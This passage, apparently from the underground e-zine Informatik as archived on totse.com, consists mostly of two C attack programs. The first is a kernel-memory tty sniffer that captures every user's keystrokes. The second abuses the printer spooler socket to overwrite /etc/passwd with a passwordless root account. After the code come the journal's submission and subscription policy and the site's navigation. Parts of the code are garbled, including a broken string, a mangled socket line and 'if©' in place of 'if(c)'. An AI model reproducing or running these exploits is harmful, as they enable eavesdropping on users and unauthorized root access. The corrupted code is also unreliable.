struct nlist nlst[] = { { "_pt_tty" }, { NULL } } ;

init() {
kmem = open("/dev/kmem",0) ;
mem = open("/dev/mem", 0) ;
}

void getkval(unsigned long offset, int *ptr, int size)
{
lseek(kmem, (long)offset, 0) ;
read(kmem, (char *)ptr, size) ;
}

main()
{
int tty, ntty=9, i, j, k, bytes, oleng=0 ;
struct tty *tbase, *tt ;
char ptr[4096], old[4096] ;

init() ;
(void) nlist("/vmunix", nlst) ;
getkval(nlst[0].n_value, (int*)(&tty), sizeof(tty)) ;
tbase = (struct tty*)malloc(bytes=ntty*sizeof(struct tty)) ;
for (;;) {
getkval(nlst[0].n_value, (int*)tbase, ntty*sizeof(struct tty)) ;
for (j=0,tt=tbase;j<ntty;j++,tt++) {
if (tt->t_rawq.c_cc) {
getkval((unsigned long)tt->t_rawq.c_cf,(int*)ptr,tt->t_rawq.c_cc);
if ((oleng>tt->t_rawq.c_cc)&&
(!strncmp(old,ptr,tt->t_rawq.c_cc))) {
for(k=0;k<(oleng-tt->t_rawq.c_cc);k++)
putchar(0x10) ;
printf("\"") ;
}
else if (strncmp(old,ptr,oleng)||(oleng==0)) {
printf("\n%5d (%1d) \"",tt->t_pgrp,i) ;
for(i=0;i<tt->t_rawq.c_cc;i++)
printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ;
printf("\"") ;
}
else if (strncmp(old,ptr,tt->t_rawq.c_cc)) {
putchar(8) ;
for(i=oleng;i<tt->t_rawq.c_cc;i++)
printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ;
printf("\"") ;
}
strncpy(old,ptr,oleng=tt->t_rawq.c_cc) ;
fflush(stdout) ;
}
}
}
}


PROG2:

/* This will overlay /etc/password with a string that emulates
a root account with no password. the first strlen(replacement-string)
bytes will be overlayed */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>

struct sockaddr_un from = { AF_UNIX, "/dev/printer" };
char bufload[1024];
char buf[1024];

main(argc, argv)
char **argv;
{
int fromfile, loadlen, count, s;
unsigned char c;

/* load up buffer with passwordless root account */
sprintf(bufload, "root::0:1:Operating with no password:/:/bin/csh\nnobody:*:-2:-2:No Body:/:\;
loadlen=strlen(bufload);

STREAM, 0)) < 0) {
fprintf(stderr, "Error openning socket.\n");
exit(1);
}
if(connect(s, &from, strlen(from.sun_path) + 2) < 0) {
fprintf(stderr, "Error connecting socket.\n");
exit(1);
}
/* lp must be a valid printer destination */ write(s, "\2lp\n", 4);
read(s, &c, 1);
if© {
fprintf(stderr, "Error %d on queuejob.\n", c);
exit(1);
}
/* give alternitive spooling file */
sprintf(buf, "\3%ld /etc/passwd\n", loadlen);
write(s, buf, strlen(buf));
read(s, &c, 1);
if© {
fprintf(stderr, "Error %d on /etc/passwd creation.\n", c);
exit(1);
}
/* write out new root password entry */
write(s, bufload, loadlen);
write(s, "", 1);
read(s, &c, 1);
if© {
fprintf(stderr, "Error %d after overwrite.\n", c);
exit(1);
}
/* bogus data file entry */
sprintf(buf, "\3%ld %s\n", 10L, "dfA000xxxxxxxxx");
write(s, buf, strlen(buf));
read(s, &c, 1);
if© {
fprintf(stderr, "Error %d on df file\n", c);
exit(1);
}
write(s, "xxxxxxxxxx", 10);
write(s, "", 1);
read(s, &c, 1);
if© {
fprintf(stderr, "Error %d at last overwrite.\n", c);
exit(1);
}
exit(0);
}



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



Informatik Submission & Subscription Policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Informatik is an ongoing electronic journal, and thus we are faced with
the ever present need for a steady influx of new material. If you have an
area of interest or expertise that you would like to write about, please do
not hesitate to contribute! We depend on reader submissions!! We do ask that
any submissions fit the following guidelines...

General Content
~~~~~~~~~~~~~~
Material for Informatik should concern information of interest to the
computer underground community. Examples of this include, but are by no
means limited to hacking and phreaking, governmental agencies, fraud,
clandestine activity, abuse of technology, recent advances in computing
or telecommunications technology, and other of information not readily
available to the public. Please include a title and author name.

Text Format
~~~~~~~~~~
* standard ASCII test
* 79 characters per line
* no TAB codes
* no special or system specific characters
* mixed case type
* single spaced, double space between paragraphs
* no pagination

News submissions
~~~~~~~~~~~~~~~
* Submit only recent news items
* Include the headline or title of the article
the author's name (if given)
the publication of origin
the date of publication
* Don't submit news that has appeared in other e-text journals

Subscription policy
~~~~~~~~~~~~~~~~~~
We are happy to provide an Internet based subscription service to our
readers. To be on our mailout list, send mail to our Internet address,
"[email protected]" and include the word subscription in the subject
of your message. If you requested a subscription before, you need to reply
again, because the old subscription list was deleted by MH.

Back Issues
~~~~~~~~~~
Back issues of Informatik are available via ftp at ftp.eff.org in the
/pub/cud/inform directory. The site also contains a plethora of other
electronic texts of interest to the "computer underground" community including
Phrack, NIA, PHUN, and the LOD tech journals.
 
To the best of our knowledge, the text on this page may be freely reproduced and distributed.
If you have any questions about this, please check out our Copyright Policy.

 

totse.com certificate signatures
 
 
About | Advertise | Bad Ideas | Community | Contact Us | Copyright Policy | Drugs | Ego | Erotica
FAQ | Fringe | Link to totse.com | Search | Society | Submissions | Technology
Hot Topics
Simpsons movie!!
blazing saddles SUCKED
Gummo
Hannibal Rising
Who's Your Caddy?
Requiem for a dream
Mobster Movies
Top Ten Movies to Watch on Acid
 
Sponsored Links
 
Ads presented by the
AdBrite Ad Network

 

TSHIRT HELL T-SHIRTS